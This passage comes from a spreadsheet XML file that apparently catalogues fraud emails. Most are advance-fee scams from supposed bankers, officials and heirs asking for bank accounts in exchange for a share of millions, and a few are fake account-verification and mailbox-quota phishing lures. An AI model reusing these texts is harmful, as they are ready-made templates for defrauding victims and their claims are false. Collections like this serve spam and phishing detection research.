this fund into your\naccount in less than Seven (7) working days.\nExpecting your immediate response while\nlooking forward to a healthy business relationship\nwith you.\nYours faithfully,\nOLUFEMI WILLIAMS\nFreeserve AnyTime - HALF PRICE for the first 3 months - Save £7.50 a month \n[URL]www.freeserve.com[/URL]</t>
  </si>
  <si>
    <t>www.freeserve.com</t>
  </si>
  <si>
    <t>2916</t>
  </si>
  <si>
    <t>To: nan\nFrom: david1111kalabi@terra.es &lt;david1111kalabi@terra.es&gt;\nDate: Wed, 14 Feb 2007 16:06:02 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2007 16:06:02 +0100</t>
  </si>
  <si>
    <t>david1111kalabi@terra.es &lt;david1111kalabi@terra.es&gt;</t>
  </si>
  <si>
    <t>URGENTLY NEEDED</t>
  </si>
  <si>
    <t>Dear Sir/Madam,\n\nI’m David Kalabi Liberia by nationality, I am contaction in regards of my fund worth $40,000,000.00usd deposited by my late father in Eco Bank Gh, Ltd. Under an escrow account.\n\nI’m in search of an urgent assist us in the\ntransfer of (USD40m) and subsequent investment in properties in your country.\nYou will be required to\n \n(1) Assist in the transfer of the said sum through Bank to Bank transfer  to your corresponded bank account.\n(2) Advise on lucrative areas for investment\n(3) Assist us in purchase of properties.\n\nIf you decide to render your service to me in this\nregard, that I am willing to\nresolved to pay you 20% of the total sum of USD40m for\nyour candid and sincere assistance and 5% for miscellaneous and 75% for investment in your country  and I'm currently\nseeking for investors that are interested.\n\nLooking forward for your assistance.\nI will be expecting your urgent response.\n\nNote: my email address is david111kalabi@yahoo.co.uk,\nAnd am presently in Ghana, Accra as a refugee so you can as well call me on +233 24 667 6944.\n\nThanks.\nYours faithfully,\nDavid Kalabi  \n\n\n\n\n\nAhora tambi&amp;eacute;n puedes acceder a tu correo Terra desde el m&amp;oacute;vil.\n\nInf&amp;oacute;rmate en [URL]www.terra.es[/URL]\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>www.terra.es</t>
  </si>
  <si>
    <t>2917</t>
  </si>
  <si>
    <t>To: nan\nFrom: LAMI KALLON &lt;lami.kl@hotmail.com&gt;\nDate: Wed, 14 Feb 2007 11:55:59 -0400</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2007 11:55:59 -0400</t>
  </si>
  <si>
    <t>LAMI KALLON &lt;lami.kl@hotmail.com&gt;</t>
  </si>
  <si>
    <t>ASSISTANCE PLEASE</t>
  </si>
  <si>
    <t>From: Mr Lami Kallon\n\nInvestment assistance in your country.\n\nAttn Pls,\n\nHow are you and the daily activities including your family? I hope everybody \nis fine.\n\nBefore I proceed, may I humbly introduce myself to your good self, I am Mr \nLami Kallon a citizen of sierra Leone in west Africa and son of the late \nminister of works who was killed as a result of the notable role he played \nduring the current civil war going on in my country Sierra Leone.\n\nI got your contact through a reliable source regarding your trust \nworthyness, as such; I decided to ask for your assistance in this \ntransaction that will remain secret and confidential at this stage.\n\nBefore the death of my father, while he was on sick bed he confided in me \nand revealed to me about the money he deposited in a Security Company in \nGhana; the sum of $25 million (Twenty five million USD) in the certificate \nof deposit I was made the next of kin.\n\nBut since his death I am living in Accra, Ghana as a refugee.\n\nMy late father earlier instructed me not to invest the money in Africa as a \nwhole because of the unstable political and economic situation in Africa \nthat I should look for trusted foreigner to be my foreign partner and \nbeneficiary so that the fund will be invested in his/her country.\n\nI want you to stand as my foreign partner so that both of us can invest the \nfund together in your country.\n\nPlease send me your private phone and fax number, as soon as you receive \nthis mail, this will enable me send you the document relating to the deposit \nand the modality on how the fund will be transfer to you in your country.\n\nFor your assistance you will be entitling to 10% of the total amount, while \n5% will be set aside for all the expense you incurred during the process of \nthe transaction.\n\nAs soon as this is done, you have to prepare for concrete arrangement that \nwill enable me join you in your country for the investment.\n\nTry as much as possible to keep this transaction secret and confidential at \nthis stage.\n\nThanks in anticipation for your kindly assistance.\n\nThis is the number you will use to reach me.+233 27 619 8662\n\nBest regard,\n\nMr Kallon\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2505</t>
  </si>
  <si>
    <t>To: nan\nFrom: ismaila_ usman &lt;ismaila_usman6@hotmail.com&gt;\nDate: Wed, 13 Sep 2006 19:17:23 +0000</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2006 19:17:23 +0000</t>
  </si>
  <si>
    <t>ismaila_ usman &lt;ismaila_usman6@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">STRICTLY CONFIDENTIAL/URGENT ASSISTANCE NEEDED </t>
  </si>
  <si>
    <t>Dear Friend,\n\n                Confidencial and top secret\n\nI know that this mail will come to you as a surprise. I am the bill and \nexchange manager in Bank of Africa. I Hoped that you will not expose or \nbetray this trust and confident that i am about to repose on you for the  \nmutual benefit of our both families.\n\nWe need your urgent assistance in transferring the sum of $11.3million \nimmediately to your account.The money  has been dormant for may years in our \nBank here without any body coming for it.\n\nWe want to release the money to you as the nearest person to our deceased \ncustomer(the owner of the account)who died a long with his supposed  next of \nkin in an air crash since July 2000.\n\nWe don't want the money to go into our Bank treasury as an abandoned fund. \nSo this is the reason why i contacted you, so that my bank will release the \nmoney to you as the nearest person to the deceased cutomer.\n\nPlease we would like you to keep this proposal as a top secret and delete if \nyou are not interested.\n\nUpon receipt of your reply, i will send you full details on how the business \nwill be executed and also note that you will have 25% of the above mentioned \nsum if you agree to transact the business with us.\n\nDR ISMAILA USMAN\nBank Of Africa,Burkina Faso-West Africa\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>3129</t>
  </si>
  <si>
    <t>To: nan\nFrom: alex daniel &lt;att22us6@hotmail.com&gt;\nDate: Wed, 13 Jun 2007 00:45:58 +0200</t>
  </si>
  <si>
    <t>Wed, 13 Jun 2007 00:45:58 +0200</t>
  </si>
  <si>
    <t>alex daniel &lt;att22us6@hotmail.com&gt;</t>
  </si>
  <si>
    <t>REPLY</t>
  </si>
  <si>
    <t>I am Mr.Alex Daniel,the Accountant General.I personally discovered an \naccount of Phillip Carter with a total sum of $75,000,000.00 [Seventy Five \nMillion United State Dollars\n\nThe owner of this account is a foreigner by name "Mr.Phillip Carter" who \ndied along with his son Andrew and two of his friends on 2nd May 2007. in a \nplane crash in Wansford,Cambridgeshire.\nFor more infomation,you can log on \n[URL]http://soccernet.espn.go.com[/URL]\n\nMr.Philip Carter vice president of Chelsea and his son,flying back from the \nChampions League match at Liverpool,were killed when their helicopter \ncrashed less than mile from home.\n\nI am now seeking for a reliable and honest person who will stand as his next \nof kin to receive this money.if it remains dormant for a period of [5] \nmonths without any claims.In  this regard, I earnestly need your full \ncooperation in transferring this dormant fund out of our bank to avoid \nconfiscating this fund.First,I will transfer $5,000,000.00 to any valid \nforeign account you will nominate,upon a successful transfer without any \ndisappointment from your side; I will then fly to meet you in your home \ndestination for sharing,thereafter we jointly transfer the remaining balance \nof $70,000,000.00 for magnitude investments.\n\n\nIf you are willing to cooperate in this project.PRIVATE E-MAIL \natt22us22@yahoo.com\n\nYours truly,\nAlex Daniel.\n\n_________________________________________________________________\nThe Live Earth concert on the 7th July 2007, with more than 150 top \nmusicians [URL]http://liveearthsos.msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://soccernet.espn.go.com http://liveearthsos.msn.com</t>
  </si>
  <si>
    <t>2790</t>
  </si>
  <si>
    <t>To: nan\nFrom: rose mathew &lt;rose_mathew6@hotmail.fr&gt;\nDate: Wed, 13 Dec 2006 20:52:15 +0000</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2006 20:52:15 +0000</t>
  </si>
  <si>
    <t>rose mathew &lt;rose_mathew6@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">FROM:ROSLIN MATHEW </t>
  </si>
  <si>
    <t>FROM:ROSLIN MATHEW\nABIDJAN-COTE D'IVOR\nFROM:ROSLIN MATHEW\n\nPLEASE MAIL BACK\n\nMy Dearest ONE\nMay the peace of gracious God be with you,please I have a problem which I \nneeded a help from you,I have decided to write you for help.\n\nI have a proposal for you-this however is not mandatory nor will I in any \nmanner compel you to honour against your will.\n\nI am in a state of delinma and made up my mind to send you this mail , I am \nROSLINE MATHEW ,21 years old and the only daughter of my late parents Mr. \nand Mrs. MATHEW NZOBEl.\n\nMy father was a highly reputable business magnet (a cocoa merchant) who \noperated in the capital of Ivory coast during his days.\n\nIt is sad to say that he passed away mysteriously in France during one of \nhis bus iness trips abroad on 12th.Febuary 2004.\n\nThough his sudden death was linked or rather suspected to have been \nmasterminded by an\nuncle of his who travelled with him at that time.\n\nBut God knows the truth! My mother died when I was just 4 years old, and \nsince then my father took me so special.\n\nBefore his death on February 12 2004 he called the secretary who accompanied \nhim to the hospital and told him that he has the sum of eight million, seven \nhundred thousand United State Dollars.(USD$8.700,000) left in one of the \nleading security company.\n\nHe further told him that he depaosited the money in my name, and finally \nissued a written instruction to his lawyer whom he said is in possession of \nall the necessary legal documents to this fund and the security company .\n\nI am just 21 years old and a university undergraduate and really don't know \nwhat to do. This is because I have suffered a lot of set backs as a result o \nf incessant political crisis here in Ivory coast. The death of my father \nactually brought sorrow to my life. I am in a sincere desire of your humble \nassistance in this regards.Your suggestions and ideas will be highly \nregarded.\n\nNow permit me to ask these few questions:-\n\n1. Can you honestly help me as your daughter?\n\n2. Can I completely trust you?\n\n3. What percentage of the total amount in question will be good for you \nafter the money is in your account?\n\nPlease, Consider this and get back to me as soon as possible.\n\nThank you so much.Mey God bless you and your family.\n\nMy sincere regards,\n\nROSLIN MATHEW\nPLEASE MAIL BACK\n\n_________________________________________________________________\nWindows Live Messenger sur i-mode : dialoguez avec vos amis depuis votre \nmobile comme sur PC ! [URL]http://mobile.live.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://mobile.live.fr</t>
  </si>
  <si>
    <t>198</t>
  </si>
  <si>
    <t>To: Recipients &lt;info@zimbra.com&gt;\nFrom: "Zimbra Alert"&lt;info@zimbra.com&gt;\nDate: Wed, 13 Apr 2016 09:09:39 +0100</t>
  </si>
  <si>
    <t>Wed, 13 Apr 2016 09:09:39 +0100</t>
  </si>
  <si>
    <t>Recipients &lt;info@zimbra.com&gt;</t>
  </si>
  <si>
    <t>Account Verification</t>
  </si>
  <si>
    <t>Dear Zimbra User,   This is to inform you that someone else was trying to log into your Zimbra account from a different location {IP:27.167.158.432 CHINA : 13/04/2016 by 11:10 AM GTM}   If this is not you kindly click below to sign in to update and verify your account for you have only 12 hours to do this in order to keep your Zimbra account active. Click Here to verify your Account.    This Email is Subject to mandatory follow, Failure to comply would lead to Permanent closure of Account. Regards, Technical support team --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL] Dear Zimbra User, This is to inform you that someone else was trying to log into your Zimbra account from a different location {IP:27.167.158.432 CHINA : 13/04/2016 by 11:10 AM GTM} If this is not you kindly click below to sign in to update and verify your account for you have only 12 hours to do this in order to keep your Zimbra account active.Click Here to verify your Account. This Email is Subject to mandatory follow, Failure to comply would lead to Permanent closure of Account.Regards,Technical support team Virus-free. [URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>1253</t>
  </si>
  <si>
    <t>To: audit_ed54@eresmas.com\nFrom: Ferdinand Edward &lt;audit_ed54@eresmas.com&gt;\nDate: Wed, 13 Apr 2005 09:12:44 +0000</t>
  </si>
  <si>
    <t>Wed, 13 Apr 2005 09:12:44 +0000</t>
  </si>
  <si>
    <t>Ferdinand Edward &lt;audit_ed54@eresmas.com&gt;</t>
  </si>
  <si>
    <t>audit_ed54@eresmas.com</t>
  </si>
  <si>
    <t>FROM:MR AUDITOR EDWARD.</t>
  </si>
  <si>
    <t>FROM:MR AUDITOR EDWARD.CHIEF AUDITOR MINISTRIE OF FINANCE ECONOMICS COTONOU-BENIN REPUBLIC. Dear Sir/Madam, Forgive my indignation if this message comes to you as a surprise and if it might offend you without your prior consent and writing through this channel.  I am AUDITOR EDWARD CHIEF AUDITOR MINISTRIE OF FINANCE ECONOMICS COTONOU-BENIN REPUBLIC.I got your information when I was searching for a reliable,honest and trustworthy person to entrust this business with.I was simply inspired and motivated to pick your contact from the many names and lists in the web site.I wish to transfer the sum of $14,300,000.00 USD (FourteenMillion Three Hundred Thousand United States Dollars only.)into your personal or company`s bank account.  This fund was a residue of the over invoiced Industrial Contract bills awarded by MINISTRIE OFFINANCE ECONOMICS COTONOU-BENIN REPUBLIC to some foreign firms.This DEAL was deliberately hatched out and carefully protected with all the attendant lope holes sealed off.As the chief auditor,I have the cooperation and mandate of the Financial Director and the Secretary. It was my consensus to seek the assistance of a willing foreigner to provide us with the facilities to transfer this money out of West Africa.This is borne out of our beleive in the non-stable and sporous political nature of this sub-region.  The original contractors have been duely paid by the Banque Centrale Des Etats De L`Afrique De L`Ouest (Central Bank of the West African States)This balanceis suspended in the escrow accounts awaiting claims by any foreign company of our choice.I intend to pay out this fund now as the organisation is winding up its activities. Based on the laws and ethics of employment,we as civil servants working under this organisation, are not allowed to operate a foreign account.This is the more reason why we needed your assistance to provide an account that can sustain this fund for safe keeping and our future investment with your comprehensive advise,assistance andpartnership in your country.  I have however agreed,as the account owner in this deal to allow you 40% of the entire sum ascompensation,why 55% will be held on trust for me while 5% will be used to defray any incidental charges and cost if any,during the course of the transactions.This transaction will be successfully concluded within 5-7 days if you accord us your unalloyed and due cooperation.You should provide the followings.  NAME OF YOUR BANK....................................ADDRESS OF THE BANK..................................ACCOUNT NUMBER.......................................BENEFICIARYS NAME...................................TEL/FAX NUMBERS OF THE BANK..........................COUNTRY OF BANK......................................YOUR MOBILE PHONE NUMBER.............................YOUR AGE.............................................OCCUPATION........................................... Upon the receipt of this informations,the certificate of job completion of one of the contracts will be issued in your for the transfering of the fund to your nominated account without delay.As with the case of all organised (sensitive)and conspired DEALS,we solicit for our unreserved confidentiality and utmost secret in this business. We hope to retire peacefullyand lead a honourable business life afterwards. There are no risks involved.  Well, this is the sharing ratio of this $14.3M for both of us:- 1) I want you to know that my 55% from this fund $14.3M is: $ 7,865,000 :00. 2) While your own 40% from this fund $14.3M is: $5,720,000:00. 3) While 5% from this fund $14.3M for any expenses Made by you and me is: $7,15,000:00. REPLY ASAP. With regards. Mr. Ferdinand EdwardAlternative auditoredward@mighty.co.za  -----------------------------------------------------------------------SOS Aldeas Infantiles. Ningún niño sin hogar.[URL]http://ad.doubleclick.net[/URL];15349974;7829128;a?[URL]http://ad.es.doubleclick.net[/URL];15339847;11200040;r?[URL]http://www.aldeasinfantiles.es[/URL]</t>
  </si>
  <si>
    <t>http://ad.doubleclick.net http://ad.es.doubleclick.net http://www.aldeasinfantiles.es</t>
  </si>
  <si>
    <t>3321</t>
  </si>
  <si>
    <t>To: nan\nFrom: KENNETH OBI &lt;kennethobia5@hotmail.com&gt;\nDate: Wed, 12 Sep 2007 18:39:27 -0600</t>
  </si>
  <si>
    <t>Wed, 12 Sep 2007 18:39:27 -0600</t>
  </si>
  <si>
    <t>KENNETH OBI &lt;kennethobia5@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Attention please</t>
  </si>
  <si>
    <t>Attention please\nCompliments to you; I sincerely apologize for the intrude into your private life, however I have a serious project which I believe would be of interest to you and for this reason I reached out to you. I am Barrister Kenneth Obi. I worked as an attorney to an Oil Servicing company {CEDRY INCORPORATED} from 1980 to 1996 when the company liquidated. Cedry liquidated and folded as a result of mismanagement and feud amongst the directors. On the 11th of June 1986, the company secretary and I took a LIFE ASSURANCE POLICY for the Chairman of the company for a period of TWENTY YEARS, which is from June 1986 till June 2006. This LIFE POLICY was taken from a reputable Insurance Company here called STANDARD TRUST INSURANCE PLC. The premium for this Life policy was paid upfront by the Cedry because it is a long-term policy.\nIn 1996, Cedry was folded but Standard Trust Insurance Company did not terminate the Life Policy we took for the Chairman because we did not apply  for cancellation or termination of the Policy. On December 2006, I got a letter from Standard Trust Insurance notifying me that the LIFE POLICY we took for Cedry Chairman was due and that I should come to their office for further discussions. I went to their office and they told me that they have Three Million Dollars accrued over a period of twenty years to pay to the Chairman of liquidated Cedry as SURRENDER VALUE for the Life Policy the company took for him. The Insurance Company knew that Cedry was folded and they asked me to provide the Chairman or his relative to receive the money.\nSince 2006 till date I have searched for the Chairman without success. I went back to tell the Insurance Company that the Chairman is very old and senile to the extent that his sight is very bad and that he cannot do anything for himself as he is almost a vegetable. The Insurance Company told me to get any of  the Chairman’s relative with his authorization to claim the surrender value for him. I have resolved to get any person or any person bearing same name as the Chairman to stand as his relative to receive the surrender value. If we don't claim this money,  no one would and the money would be retained in the coffers of the Insurance Company as their profit. I feel it is rather appropriate that we team up and claim this money and use some percentage of it to help the poor and the less privilege in our society than allow the Insurance Company to retain it as profit.\nI contacted you in trust believing that you will not run away with the money if it enters your account. The Insurance Company have very high respect and regards for me and will be obliged to released the Surrender Value to whoever I present to them as heir to the Chairman. I will obtain for you all that is required to execute this transaction successfully. I have in my file some documents for the existence of the Cedry and the Life Policy. I will send to you once you indicate your interest. I will also send a claim application specimen to you, which you will fill and send to the Insurance Company for the release of the surrender value to your account. Your share for assisting in this transaction will be One Million Dollars. If you cannot execute this transaction for any reason, please introduce someone who is capable and I will reward you with Fifty thousand dollars after the transaction. Reply urgently if you are interested to execute this with me. Regards,Barrister Kenneth Obi\n_________________________________________________________________\nMore photos; more messages; more whatever – Get MORE with Windows Live™ Hotmail®. NOW with 5GB storage.\n[URL]http://imagine-windowslive.com[/URL]</t>
  </si>
  <si>
    <t>http://imagine-windowslive.com</t>
  </si>
  <si>
    <t>127</t>
  </si>
  <si>
    <t>To: sameez11@yahoo.com\nFrom: SOLOMON azeez &lt;sameezx6@go.com&gt;\nDate: Wed, 12 Mar 2003 08:50:45 -0800</t>
  </si>
  <si>
    <t>Wed, 12 Mar 2003 08:50:45 -0800</t>
  </si>
  <si>
    <t>SOLOMON azeez &lt;sameezx6@go.com&gt;</t>
  </si>
  <si>
    <t>sameez11@yahoo.com</t>
  </si>
  <si>
    <t>PLEASE   RESPOND</t>
  </si>
  <si>
    <t>DR.SOLOMON AZEEZ \n\nFEDERAL MINISTRY OF PETROLUEM RESOURCES(F.M.P.R) \n\nLAGOS NIGERIA. \n\nATTN:SIR, \n\nREQUEST FOR ASSISTANCE- STRICTLYCONFIDENTIAL \n\nI am Dr SOLOMON AZEEZ, an accountant in the Ministry \nof petroleum Resources (MPR) and a member of a \nthree-man Tender Board in charge of contract review \nand payment approvals. I came to know of you in my \nsearch for a reliable person to handle a very \nconfidential transaction that involves the transfer of \na huge sum of money to a foreign account. It may sound \nstrange but exercise patience and read on. There were \nseries of contracts executed by a consortium \nMultinational in the Oil industry in favor of Ministry \nof Petroleum Resources among which were: \n\n1. The extension of pipeline network within Nigeria \nfor crude oil, Down stream products distribution and \nsubsequent evacuation- US$ 195 Million. \n\n2. Contract for the Turn Around Maintenance (TAM) of \nthe various refineries in the country~ US$ 152Million. \n\n\n3. The construction of storage tanks for petroleum \nproducts (Depots) US$240 Million. The original values \nof this contract were deliberately over invoiced to \nthe sum of US $35.5million American Dollars which has \nnow been approved and is now ready to be transferred \nbeing that the companies that actually executed these \ncontracts has been fully paid and project officially \ncommissioned. consequently, my colleagues and I are \nwilling to transfer the total amount to your account \nfor subsequent disbursement since we are Civil Servant \nand are prohibited by the Code of Conduct Bureau \n(Civil Servant Laws) from opening operating foreign \naccount in our names. Needless to say, the trust posed \non you at this juncture is enormous. In return, we \nhave agreed to offer you 30% of the transferred sum \nwhile 10% shall be set aside for accidental expenses \n(Internal &amp; External) between the parties in the \ncourse of the transfer. We will mandate you to draw up \nan investment plan for us of which you will control \nsince we cannot bring our shares back to Nigeria. We \nare very interested in investing in real estate in \nyour country. You must however note that this \ntransaction is subjected to the following termsand \nconditions: \n\n1. Our conviction of your transparent honesty \nanddiligence. \n\n2. That you would treat this transaction with utmost \nsecrecy and confidentiality because of \nthecircumstances we now find ourselves. \n\n3. That the funds would be transferred to an account \nover which you have absolute control. Modalities have \nbeen worked out at the highest level of the presidency \nat the Central Bank of Nigeria for the immediate \ntransfer of the funds within 14 working days, subject \nto your satisfaction of the above stated terms. Our \nassurance is that your role is 100% risk free. To \naccord this transaction, the legality it deserves and \nfor mutual security of the parties involved and the \nfunds, the whole approval procedures will be \nofficially and legally processed with your name or the \nname of your company you may nominate as the bonafide \nbeneficiary. Also, be informed that our main reason of \ncontacting you is for the obvious reason that we will \nwant to invest these funds in the real estate. It is \nour believe that you can be ofimmense help in this \nregards. Kindly expedite action so as to enable us \ninclude this transaction into this batch as payment to \nforeign contractors is usually carried out on \nquarterlybasis. Please, contact me as soon as possible \non my private e-mail address: \n\nBest regards, \n\nDR.SOLOMON AZEEZ \n\n\n\n\n\n___________________________________________________\nGO.com Mail                                    \nGet Your Free, Private E-mail at [URL]http://mail.go.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>628</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Email Server" &lt;sandy@ghsps.edu.hk&gt;\nDate: Wed, 12 Jul 2017 02:50:50 -0700</t>
  </si>
  <si>
    <t>Wed, 12 Jul 2017 02:50:50 -0700</t>
  </si>
  <si>
    <t>"Email Server" &lt;sandy@ghsps.edu.hk&gt;</t>
  </si>
  <si>
    <t>Your Mailbox  Storage Is Running Low, Please Upgrade Now</t>
  </si>
  <si>
    <t>g0DRD9V6866X31        	         F5NF6N3B4C:   	      `A8v84F5{B1 (jose@monkey.org) NCAY29\07ABDC89!     F5NF6OE1`6F:  	       b11P11lE8a0FR300C`A8v84F5{B1 4D4DS73\07u28[8C   N0DN45_8C0C`A8\07N0DQ8DFDY20 cA5e36b16v7C01eB0F5NF6002   sFEW280CO600081O60v84F5NF64D 4DS47}1AR3015GBQ4DBB   DEdCANE5N0BC8cA50C93`A8v8415GBQ4DBB1A   [URL]http://jose@monkey.org[/URL]   `A8v84F5{B1\07f2FNCAY29DC 890CY82g9CO60N0DS47}1AR3015GB      F5NF6v7CNF6NBA:   	      F5{B1OE1`6FN2D_C3    服務器警報      郵件主題:    您的郵箱 (jose@monkey.org) 今天將被關閉!  郵件信息:  我們注意到，您的郵箱 配額即將用完  不久後，您將不再能夠 接收或發送新郵件。  現在，你需要你的郵件配 額升級到15GB免費  點擊以下鏈接，讓您的15GB免費：  [URL]http://jose@monkey.org[/URL]  您的郵箱將是今天關 閉，如果你不升級到15GB     郵件發件人:    郵箱信息中心</t>
  </si>
  <si>
    <t>2336</t>
  </si>
  <si>
    <t>To: nan\nFrom: david kofi &lt;davidkofi42@hotmail.com&gt;\nDate: Wed, 12 Jul 2006 15:05:20 +0000</t>
  </si>
  <si>
    <t>Wed, 12 Jul 2006 15:05:20 +0000</t>
  </si>
  <si>
    <t>david kofi &lt;davidkofi42@hotmail.com&gt;</t>
  </si>
  <si>
    <t>I am waiting your response</t>
  </si>
  <si>
    <t>Dear Friend\n\nMy name is Mr. David Kofi, the regional manager of International commercial \nBank (ICB) Kaneshie Branch Ghana.\n\nI am a Ghanaian married with two kids.\n\nI have packaged a financial transaction that will benefit both of us. As the \nregional manager of the bank, it�s my duty to send financial reports to my \nhead office in the capital city of Accra.\n\nOn the course of the last year 2005 end of the of the year�s report, I \ndiscovered that my branch in which I am the manager made Six Million Five \nHundred and Fifty Thousand US Dollars (6,550.000.00) of which my head Office \nis not aware of and will never be aware of. I have since then PLACED this \nfund on a SUSPENCE ACCOUNT without a beneficiary.\n\nAs an officer of the bank, I cannot be directly connected to this money thus \nI am compelled to request for your assistance to receive this money into \nyour bank account.\n\nI intend to part with 30% of this fund to you while 70% shall be for me.\nI do need to assure you that there is practically no risk involved in this. \nIt�s going to be a bank-to-bank transfer.\n\nAll I need from you is to stand as the original depositor of this fund.\nIf you accept this offer, I will appreciate your timely response.\n\nWith regards,\n\nDavid Kofi\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2335</t>
  </si>
  <si>
    <t>To: nan\nFrom: princess silvee09 &lt;princess_silvee09@hotmail.com&gt;\nDate: Wed, 12 Jul 2006 09:45:24 +0000</t>
  </si>
  <si>
    <t>Wed, 12 Jul 2006 09:45:24 +0000</t>
  </si>
  <si>
    <t>princess silvee09 &lt;princess_silvee09@hotmail.com&gt;</t>
  </si>
  <si>
    <t>WAITING TO HEAR FROM YOU SOONEST.</t>
  </si>
  <si>
    <t>Dear Friend,\n\nGood day and Compliments.\n\nI am writing this letter in confidence believing that if it is the wish of \nGod for you to help me and my family,God almighty will bless and reward you \naboundantly and you would never regreat this.\n\nI am a female student from University of Burkina-Faso,Ouagadougou.I am 25 \nyrs old.I'd like any person who can be caring,loving and home oriented.I \nwill love to have a long-term relationship with you and to know more about \nyou.I would like to build up a solid foundation with you in time coming if \nyou can be able to help me in this transaction.\n\nWell,my father died on 5th May 2005 and left I and my junior brother behind. \nHe was a king, which our town citizens titled him over sixteen years before \nhis death.\n\nI was a princess to him and I am the only person who can take care of his \nwealth now because my junior brother is still young and my mother is not \nliterate enough to know all my father's wealth. He left the sum of USD \n7,350, 000.00 dollars (seven Million, Three Hundred and Fifty Thousand US \nDollars),in a security company.This money was annually paid into my late \nfathers account from Shell petroleum development company(SPDC)and chevron \noil company operating in our locality for the compensation of youth and \ncommunity development in our jurisdiction.\n\nI don't know how and what I will do to invest this money somewhere in \nabroad,so that my father's kindred will not take over what belongs to my \nfather and our family,which they were planning to do without my present \nbecause I am a female as stated  by our culture in the town.\n\nNow,I urgently need your humble assistance to move this money from the \nsecurity company to your bank account and I strongly believe that by the \ngrace of God,you will help me invest this money wisely.\n\nI am ready to pay 20% of the total amount to you if you help us in this \ntransaction and another 10% interest of Annual After Income to you,for \nhandling this transaction for us,which you will strongly have absolute \ncontrol over.\n\nIf you can handle this project sincerely and also willing to assist me in \nlifting this fund,kindly reach me.You can reach me through this email \nid.(princess_silvee2006@yahoo.com).\n\n\n\nPlease, note that this transaction is 100% risk free and I hope to commence \nthe transaction as quick as possible, I will send you my picture as soon as \nI hear from you.\n\nYours sincerely,\n\nPrincess  Silvee.\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1077</t>
  </si>
  <si>
    <t>To: nan\nFrom: jen1 &lt;jentaylor10@eramail.co.za&gt;\nDate: Wed, 12 Jan 2005 15:59:58 +0000</t>
  </si>
  <si>
    <t>Wed, 12 Jan 2005 15:59:58 +0000</t>
  </si>
  <si>
    <t>jen1 &lt;jentaylor10@eramail.co.za&gt;</t>
  </si>
  <si>
    <t>URGENT HELP</t>
  </si>
  <si>
    <t>\nATTN: SIR,\n\nI AM MISS JEN CHARLES TAYLOR 25YRS,THE DAUGHTER OF THE FORMER LIBERIAN PRESIDENT CHARLES TAYLOR,I HAVE IN MY POSSESSION THE SUM OF NINE MILLION UNITED STATE DOLLARS{$9,000,000.00},AND THE TOP LIST OF MY PRIORITY IS WHERE TO INVEST THIS MONEY OUTSIDE MY COUNTRY. "REASON BEST \nKNOWN TO ME".I URGENTLY NEED YOUR ASSISTANCE IN PROVIDING A RELIABLE GENUINE TRADE OR COMPANY WHERE I CAN INVEST THE FUND AND IMMEDIATELY MEET YOU IN YOUR COUNTRY FOR SETTLEMENT.PLEASE I WILL KINDLY WELCOME \nYOUR ADVICE TOO.\n\nI AM EXPECTING YOUR URGENT MAIL RESPONSE. I NEED YOUR SUPPORT AND SERIOUSNESS.I AM PRESENTLY ON EXILE NOW WITH MY BROTHER CHOKRI TAYLOR AFTER THE UNITED STATES ASKED MY FATHER TO RESIGN AS THE PRESIDENT OF LIBERIA. MY FATHER IS ALSO ON EXILE IN ONE OF THE WEST AFRICAN COUNTRY.\n\n\nYOUR URGENT RESPONSE IS EXPECTED. SEND YOUR CONFIDENTIAL PHONE NUMBER SO THAT I CAN REACH YOU WHEN NECCESSARY.\n\n\nMISS JEN CHARLES TAYLOR\n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at clevelandclick.com- [URL]http://www.clevelandclick.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.clevelandclick.com</t>
  </si>
  <si>
    <t>1076</t>
  </si>
  <si>
    <t>To: nan\nFrom: peter_7lang &lt;peter_7lang@yahoo.com&gt;\nDate: Wed, 12 Jan 2005 14:10:32 +0100</t>
  </si>
  <si>
    <t>Wed, 12 Jan 2005 14:10:32 +0100</t>
  </si>
  <si>
    <t>peter_7lang &lt;peter_7lang@yahoo.com&gt;</t>
  </si>
  <si>
    <t>HOW ARE YOU TODAY,</t>
  </si>
  <si>
    <t>\nMR. PETER LANG \nPostfach, 3001 Bern Switzerland \n\nIMPERATIVE AND PRIVATE.\n\n I am contacting you on business transfer of a huge sum of money from a deceased account. Though I know that a transaction of this magnitude will make any one apprehensive and worried, but I am assuring you that all will be well at the end of the day. We decided to contact you due to the urgency of this transaction. PROPOSITION; We discovered an abandoned sum of US$7,500,000.00 (Seven Million Five Hundred Thousand United States Dollars) in an account that belongs to one of our foreign customers who died along with his entire family. Since his death, none of his next-of-kin or relations has come forward to lay claims for this money as the heir. We cannot release the fund from his account unless someone applies for claim as the next-of-kin to the deceased as indicated in our banking guidelines. Upon this discovery, we now seek your permission to have you stand as a next of kin to the deceased as all documentations will be carefully worked out by us for the funds (US$7,500,000.00) to be released in your favour as the beneficiary's next of kin. It may interest you to know that we have secured from the probate an order of madamus to locate any of deceased beneficiaries. Please acknowledge receipt of this message in acceptance of our mutual business endeavour by furnishing me with the following; 1. Your name and address 2. Direct Telephone and fax numbers These requirements will enable us file letter of claim to 